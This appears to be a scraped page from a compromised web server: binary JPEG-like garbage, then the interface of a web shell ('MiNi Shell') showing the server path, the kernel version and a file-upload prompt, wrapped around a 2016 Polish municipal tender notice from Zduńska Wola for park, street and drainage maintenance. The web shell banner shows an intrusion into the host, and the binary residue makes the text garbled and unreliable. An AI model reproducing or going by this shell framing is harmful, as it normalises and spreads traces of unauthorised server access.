JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160422/100478-N-2016.html

<p class="kh_header"><b>Zduńska Wola: Utrzymanie zieleni, sprzątanie terenów miejskich, pasów drogowych dróg gminnych oraz  utrzymanie powierzchniowego systemu odwodnienia na terenie miasta Zduńska Wola w 2017 roku</b><br>
<b>Numer ogłoszenia: 100478 - 2016; data zamieszczenia: 22.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Zduńska Wola , ul. Stefana Złotnickiego 12, 98-220 Zduńska Wola, woj. łódzkie, tel. 43 825 02 00, faks 43 825 02 02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdunskawola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni, sprzątanie terenów miejskich, pasów drogowych dróg gminnych oraz  utrzymanie powierzchniowego systemu odwodnienia na terenie miasta Zduńska Wola w 2017 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie zieleni, sprzątanie terenów miejskich, pasów drogowych dróg gminnych oraz utrzymanie powierzchniowego systemu odwodnienia na terenie Miasta Zduńska Wola w 2017 roku  z podziałem na 4 części:
CZĘŚĆ I - Utrzymanie terenów zieleni urządzonej należących do Miasta Zduńska Wola (parki, skwery, place zabaw).
CZĘŚĆ II - Utrzymanie zieleni oraz sprzątanie pasów drogowych dróg gminnych na terenie miasta Zduńska Wola.
CZĘŚĆ III - Utrzymanie działek miejskich poza terenami urządzonymi i pasami dróg oraz usługi dla mieszkańców.
Część IV - Utrzymanie drożności systemu powierzchniowego odwodnienia Miasta Zduńska Wola.

Wykonawca może złożyć ofertę na dowolną ilość części.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 8 do SIWZ
Zamawiający określa, że termin płatności dla niniejszego zamówienia musi mieścić się w przedziale od 14 do 30 dni.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 90.64.00.00-5, 77.30.00.00-3, 98.35.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda wniesienia wadium w wysokości: 17500,00 złotych (słownie: siedemnaście tysięcy pięćset złotych 00/100), przy czym wysokość wadium dla poszczególnych części wynosi:
Część nr 1   	5.000,00 zł (słownie: pięć tysięcy złotych)
Część nr 2  	5.000,00 zł (słownie: pięć tysięcy złotych)
Część nr 3 		5.000,00 zł (słownie: pięć tysięcy złotych)
Część nr 4 		2.500,00 zł (słownie: dwa tysiące pięćset złotych)
2.Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust.5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r., Nr 42, poz. 275,z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Uwaga! Wadium wnoszone w poręczeniach, gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w pkt 2 ppkt 5), należy zdeponować przed upływem terminu składania ofert w Kasie Urzędu Miasta Zduńska Wola (budynek nr 4, parter, pokój nr 411). Z treści tych dokumentów musi wynikać bezwarunkowe, (na każde pisemne żądanie zgłoszone przez Zamawiającego) zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy. Wyżej wymienione gwarancje i poręczenia nie mogą wprowadzać żadnych dodatkowych warunków merytorycznych. Ponadto wadium wniesione w  formie gwarancji i poręczeń musi mieć taką samą płynność jak wadium wniesione w pieniądzu, co oznacza, że dochodzenie roszczenia z tytułu zapłaty wadium nie może być utrudnione, w szczególności poprzez rozumienie terminu, w którym żądanie zapłaty Zamawiającego powinno dotrzeć do Gwaranta lub Poręczyciela jako terminu ważności gwarancji i poręczeń. Terminu, w którym żądanie zapłaty Zamawiającego powinno dotrzeć do Gwaranta lub Poręczyciela musi dawać możliwość realnego zaspokojenia roszczeń Zamawiającego z Gwarancji lub Poręczenia w przypadku zaistnienia w terminie związania ofertą któregokolwiek z przypadków, o których mowa w art 46 ust. 4a i 5 ustawy. Termin ten musi uwzględniać w szczególności czas niezbędny na dostarczenie pisemnego żądania zapłaty Zamawiającego do Gwaranta lub Poręczyciela.
3.Wadium wnoszone w pieniądzu należy wpłacić przelewem przed upływem terminu składania ofert na rachunek bankowy Zamawiającego:
Bank Spółdzielczy w Poddębicach Nr konta 09 9263 0000 0544 0094 2005 0001.
4.Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
5.Zamawiający dokona zwrotu wadium, zgodnie z warunkami określonymi w art. 46 ustawy.
6.Wykonawca zobowiązany jest wnieść wadium na cały okres związania oferta, określony w rozdziale XI SIWZ.
7.Zamawiający zatrzymuje wadium zgodnie z warunkami określonymi w art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże,  że posiada aktualne zezwolenie wydane przez organ właściwy na prowadzenie działalności w zakresie zbierania, transportowania i unieszkodliwiania odpadów będących przedmiotem zamówienia (Dz. U. z 2013 r., poz. 21 z późniejszymi zmianami)  dla części 1 - 4,
Ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty i oświadczenia według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną usługę odpowiadającą swoim rodzajem usługom stanowiącym przedmiot zamówienia (dla każdej z części) o wartości minimum w zł brutto:
Część nr 1   	190.000,00 zł
Część nr 2  	190.000,00 zł
Część nr 3 		170.000,00 zł
Część nr 4 		  95.000,00 zł	
 
W przypadku składania oferty na wybrane części lub całość zamówienia, Zamawiający uzna również jedno zamówienie o wartości odpowiadającej odpowiednio sumie wybranych części lub dla całości zamówienia o wartości 645.000,00 zł pod warunkiem, że zamówienie będzie odpowiadało swoim rodzajem usługom stanowiącym przedmiot zamówienia poszczególnych części.

Zamawiający informuje, że w przypadku dokumentów podanych w walucie innej niż PLN, przeliczanie wartości na walutę polską nastąpi na podstawie Tabeli A kursów średnich NBP z dnia ogłoszenia przedmiotowego przetargu do Biuletynu Zamówień Publicznych;

Ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty i oświadczenia według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje sprzętem do realizacji zamówienia na każdą część:
Część nr 1
- pług dostosowany do odśnieżania alejek parkowych i chodników - 1 szt.;
- ciągnik z osprzętem ogrodniczym (kosiarka rotacyjna itp.) - 1 szt.;
- wykaszarka- 5 szt.;
- kosiarka mechaniczna - 3 szt. (w tym 1 szt. z koszem);
- beczkowóz do podlewania - 1 szt.;
- opryskiwacz ręczny i mechaniczny - 1 szt.;
- dmuchawa - 2 szt.;
- piła spalinowa  - 2 szt.;
- podnośnik do 16 metrów.
Część nr 2 
- pług dostosowany do odśnieżania chodników, ciągów pieszo-rowerowych i ścieżek rowerowych - 1szt.;
- ciągnik z osprzętem ogrodniczym (kosiarka rotacyjna itp.) - 1 szt.;
- wykaszarka - 5 szt.;
- kosiarka mechaniczna - 3 szt. (w tym 2 szt. z koszem);
- kosiarka bijakowa - 1 szt.;
- beczkowóz do podlewania - 1 szt.;
- opryskiwacz ręczny i mechaniczny - 1 szt.;
- dmuchawa - 2 szt.;
- piła spalinowa  - 2 szt.;
Część nr 3  
- ciągnik z osprzętem ogrodniczym (kosiarka rotacyjna, pług do odśnieżania itp.) - 1 szt.;
- wykaszarka- 3 szt.;
- kosiarka mechaniczna  - 3 szt.;
- opryskiwacz ręczny i mechaniczny - 1 szt.;
- dmuchawa - 2 szt.;
- piła spalinowa  - 2 szt.;
Część nr 4 
- koparko-ładowarka  wraz z odmularką - pogłębiarką rowów - 1 szt.;
- koparka podsiębierna
- samochód ciężarowy - 1 szt;
- kosa spalinowa - 4 szt.;
- piła spalinowa  - 2 szt.;

W przypadku składania oferty na więcej niż jedną część, w wykazie należy wykazać sumę wszystkich narzędzi i urządzeń wymaganych dla poszczególnych części.
Ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty i oświadczenia według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca wykaże się spełnieniem warunku poprzez złożenia oświadczenia wg zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Wykonawca wykaże się spełnieniem warunku poprzez złożenia oświadczenia wg zał. nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów. Treść pełnomocnictwa powinna dokładnie określić zakres umocowania. Pełnomocnictwo musi być złożone w oryginale albo w formie kopii poświadczonej notarialnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 99</li>
<li>2 - Termin płatności - 1</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający dopuszcza niżej wymienione zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy zgodnie z art. 144 ustawy Prawo Zamówień Publicznych w następujących przypadkach:
1)	zmiana sposobu spełnienia świadczenia  będzie możliwa w przypadku zmian legislacyjnych przepisów aktów prawnych normujących wykonanie przedmiotu zamówienia, w takim przypadku sposób spełnienia świadczenia zostanie zmieniony na zgodny z obowiązującymi przepisami w tym zakresie;
2)	zmiana wartości cen jednostkowych brutto będzie możliwa w przypadku ustawowej zmiany stawki podatku VAT, w takiej sytuacji cenny jednostkowe brutto zostaną zmienione na wyliczone w oparciu o aktualne przepisy dotyczące naliczania podatku VAT,
3)	zmiana wartości umowy będzie możliwa w przypadku:
a)	zmiany cen jednostkowych brutto, o których mowa w ppkt 2.,
b)	zmiany ilości wykonanych usług.
2.W celu dokonania zmiany zapisów umowy wnioskowanych przez Stronę, zobowiązana jest ona pisemnie wystąpić z propozycją zmiany warunków umowy wraz z ich uzasadnieniem. Zmiany te muszą być korzystne lub neutralne dla Zamawiającego.
3.Wszelkie zmiany do umowy wymagają pisemnego aneksu podpisanego przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdunskawola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zduńska Wola, ul. Złotnickiego 12, 98-220 Zduńska Wola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.11.2016 godzina 11:45, miejsce: Ofertę należy złożyć w zaklejonej kopercie w Kancelarii Urzędu Miasta Zduńska Wola, ul. Złotnickiego 12, oznaczając kopertę  zgodnie z rozdziałem XII pkt 12 SIWZ.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje możliwość wykluczenia z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie terenów zieleni urządzonej należących do Miasta Zduńska Wola (parki, skwery, place zabaw)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymagane roboty na terenach zlokalizowanych na Placu Wolności - teren wokół Centrum Integracji Ratusz   
1. Omiatanie alejek parkowych -  codziennie,
2. Opróżnianie koszy na śmieci - codziennie do godziny 8 rano, (w przypadku imprez artystyczno- rozrywkowych -  na bieżąco, aby nie dopuścić do ich przepełnienia),
3. Usuwanie śniegu z opaski budynku, odśnieżanie alejek parkowych oraz miejsc postojowych (za wyjątkiem parkingów)  na całą szerokość, nie później niż dwie godziny od zakończenia opadów; przeciwdziałanie śliskości, usuwanie błota pośniegowego z terenów utwardzonych, ciągów komunikacyjnych i wjazdu do garażu podziemnego. 
Wywóz śniegu wg potrzeb w miejsce wskazane przez zamawiającego,
4.Prace porządkowe: zbieranie papierów, szkła, niedopałków papierosowych, połamanych gałęzi, zasypywanie dołów kopanych przez psy,  rozrzucanie kretowin na bieżąco od kwietnia do listopada.
Zbieranie śmieci w pozostałym okresie trwania umowy - w przypadku wystąpienia zaśmiecenia terenu,
5.Bieżące mycie zabrudzonych ławek i koszy na śmieci, konserwowanie ławek po uzgodnieniu z zamawiającym, utrzymanie porządku wokół ławek - likwidacja plam (rożnego pochodzenia) z kostki i płyt chodnikowych,
